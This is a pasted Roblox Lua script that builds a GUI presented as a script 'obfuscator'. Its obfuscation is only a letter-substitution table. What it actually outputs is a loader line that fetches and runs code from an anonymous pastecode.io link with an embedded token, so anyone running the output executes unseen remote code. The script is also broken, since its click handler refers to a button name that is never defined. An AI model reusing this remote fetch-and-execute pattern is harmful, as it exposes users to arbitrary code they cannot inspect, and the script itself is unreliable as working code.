Untitled
unknown
plain_text
3 years ago
4.2 kB
2
Indexable
Never
local Test = Instance.new("ScreenGui") local Scripted = Instance.new("Frame") local Frames = Instance.new("Folder") local Obfsucate = Instance.new("TextButton") local UICorner = Instance.new("UICorner") local Deletegui = Instance.new("TextButton") local UICorner_2 = Instance.new("UICorner") local Text = Instance.new("TextBox") local UICorner_3 = Instance.new("UICorner") local UICorner_4 = Instance.new("UICorner") Test.Name = "Test" Test.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") Test.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Scripted.Name = "Scripted" Scripted.Parent = Test Scripted.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Scripted.BorderColor3 = Color3.fromRGB(0, 0, 0) Scripted.Position = UDim2.new(0.152290881, 0, 0.166702509, 0) Scripted.Size = UDim2.new(0, 654, 0, 302) Frames.Name = "Frames" Frames.Parent = Scripted Obfsucate.Name = "Obfsucate" Obfsucate.Parent = Scripted Obfsucate.BackgroundColor3 = Color3.fromRGB(170, 170, 170) Obfsucate.BorderColor3 = Color3.fromRGB(170, 170, 170) Obfsucate.Position = UDim2.new(0.807775021, 0, 0.356894135, 0) Obfsucate.Size = UDim2.new(0, 86, 0, 25) Obfsucate.Font = Enum.Font.SourceSans Obfsucate.TextColor3 = Color3.fromRGB(0, 0, 0) Obfsucate.TextSize = 20.000 Obfsucate.TextWrapped = true UICorner.Parent = Obfsucate Deletegui.Name = "Deletegui" Deletegui.Parent = Scripted Deletegui.BackgroundColor3 = Color3.fromRGB(170, 170, 170) Deletegui.BorderColor3 = Color3.fromRGB(170, 170, 170) Deletegui.Position = UDim2.new(0.809299529, 0, 0.153433681, 0) Deletegui.Size = UDim2.new(0, 86, 0, 25) Deletegui.Font = Enum.Font.SourceSans Deletegui.TextColor3 = Color3.fromRGB(0, 0, 0) Deletegui.TextSize = 20.000 Deletegui.TextWrapped = true UICorner_2.Parent = Deletegui Text.Name = "Text" Text.Parent = Scripted Text.BackgroundColor3 = Color3.fromRGB(170, 170, 170) Text.BorderColor3 = Color3.fromRGB(170, 170, 170) Text.Position = UDim2.new(0.0243184268, 0, 0.124998093, 0) Text.Size = UDim2.new(0, 477, 0, 225) Text.Font = Enum.Font.SourceSans Text.PlaceholderColor3 = Color3.fromRGB(0, 0, 0) Text.Text = "" Text.TextColor3 = Color3.fromRGB(0, 0, 0) Text.TextSize = 20.000 Text.TextWrapped = true Text.TextXAlignment = Enum.TextXAlignment.Left Text.TextYAlignment = Enum.TextYAlignment.Top UICorner_3.Parent = Text UICorner_4.CornerRadius = UDim.new(0, 4) UICorner_4.Parent = Scripted local function PWYL_fake_script() local script = Instance.new('LocalScript', Scripted) Obfuscate.MouseButton1Click:Connect(function() local Alphabet = {"A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", ".", "=", "'", " ", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0"} local Obfuscatedalpha = {"XX1", "YX3", "4FF", "DD4", "EE5", "FF8", "GG7", "HH6", "HG2", "JH4", "KJ3", "LL7", "MM3", "NN4", "OO8", "PP2", "QW6", "RW4", "SA4", "TT5", "UN3", "LE2", "LA6", "XX6", "YY5", "ZZ6", "xx1", "yx3", "4ff", "dd4", "ee5", "ff8", "gg7", "hh6", "hg2", "jh4", "kj3", "ll7", "mm3", "nn4", "oo8", "pp2", "qw6", "rw4", "sa4", "tt5", "un3", "le2", "la6", "xx6", "yy5", "zz6", "156", "757", "897", "652", "43a", "5Fd", "1As", "Gr1", "5Gt", "u7i", "oi1", "Ki6", "Ha4", "Kl8"} local Newtext = "" for x = 1, string.len(Text.Text) do for v, i in pairs(Alphabet) do if i == string.sub(Text.Text, x, x) then Newtext = Newtext .. Obfuscatedalpha[v] end end end Text.Text = "local Txt52362357623596235879235789258793= loadstring(game:HttpGet('https://api.pastecode.io/anon/raw-snippet/qmvonusj?raw=inline&auth=eyJhbGciOiJIUzI1NiIsImtpZCI6Im1haW4iLCJ0eXAiOiJKV1QifQ.eyJ1c2VyX2lkIjoiZDE4NzAxN2MtMTdkMC00MjJiLThhZWYtNTE1ZDAxOWNjM2YyIiwiaXNfYW5vbnltb3VzIjp0cnVlLCJleHAiOjE2NTA2MjA1NTcsImlzcyI6InNuaXBhcmUifQ.P08xXgi-Y6w0MCNaBQ6d3CvvkTWrYkzU7xTzz3CmPG4&password='))(); local Txt52362357623596235879235789258793.Create(" .. Newtext .. ")" end) Deletegui.MouseButton1Click:Connect(function() script.Parent.Parent:Destroy() end) end coroutine.wrap(PWYL_fake_script)()